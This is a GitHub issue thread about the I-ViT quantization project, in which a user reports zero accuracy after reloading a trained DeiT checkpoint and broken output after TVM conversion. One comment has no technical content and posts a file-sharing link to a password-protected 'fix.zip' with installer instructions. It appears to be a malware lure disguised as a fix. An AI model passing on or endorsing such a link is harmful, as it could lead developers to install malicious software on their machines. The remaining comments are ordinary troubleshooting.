### ISSUE TITLE
0 accuracy after finished training.

### ISSUE THREAD

**Issue by dedoogong** [zkkli/I-ViT#11]
Hi. thanks for your great job. 

I trained deit-base with your QAT method using quant_train.py. 
while training, it showed good eval TOP1 accuracy over 82 in early epoches.
but when I load the saved checkpoint.pth.tar and run the validation again, it showed Top1 accury : 0 .
also I tried to inference one image with a cat image, the Top5 result was just useless. 
why this happened? is your save/load method correct? or there are something else related to this issue?

Please let me know any hint ~!
thank you!

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dedoogong** [comment]
I fixed it by changing pytorch inference code, but after run convert_model.py, the TVM output useless values again!
why? is convert_model.py working correctly?

**Comment by seungwoo-ji-03** [comment]
@dedoogong 
Did the training loss decrease well? I checked the code, and it seems that validation runs after every epoch. How did the validation results turn out?
I’m asking because, in my case, the loss doesn’t seem to be decreasing properly.
